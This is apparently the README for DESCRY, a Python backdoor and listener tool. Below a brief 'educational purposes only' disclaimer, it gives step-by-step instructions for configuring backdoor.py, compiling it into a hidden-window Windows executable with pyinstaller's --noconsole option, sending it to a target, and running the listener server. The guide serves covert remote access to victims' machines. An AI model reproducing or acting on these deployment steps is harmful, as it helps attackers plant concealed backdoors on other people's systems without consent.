DESCRY v1.0(beta)
DISCLAIMER
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
**COMPLETE RESPONSIBILITY of the END-USER**. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Also we inform you that some of your your actions may be **ILLEGAL** and you **CAN NOT** use this software to test person or company without **WRITTEN PERMISSION** from them.DEVELOPERS & CONTRIBUTORS
- HADES (https://github.com/hades-onion)
BACKDOOR
Backdoor is a term that refers to the access of the software or hardware of a computer system without being detected. The backdoor can be created by the developer themselves so that they can quickly and easily make changes to the code without the need to log in to the system.
SCREENSHOT (Listner)
TESTED :-
(server)
- Linux
- Windows
- Android
- IOS
- OSX
TESTED :-
(Backdoor)
- Linux
- Windows
- Android
- OSX
PREREQUISITES ( Please verify if you have installed )
- Python 3.*
- termcolor (pip install termcolor)
Guide
1. BACKDOOR
- Open backdoor.py with editor(text/script)
- Change these two options and save file now ether you can run this python script straight away on target
#OR
- You can convert this python file to exe using pyinstaller
- Install python3 on your windows.
- pyinstalller backdoor.py --noconsole --onefile
- you will get the exe file in dist folder send this file to target and start the server.
2. SERVER
- apt-get install python3
- apt-get install python3-pip
- pip install termcolor
- apt-get install git
- git clone https://github.com/hades-onion/descry
- cd descry
- sudo chmod +x server.py
- sudo python3 server.py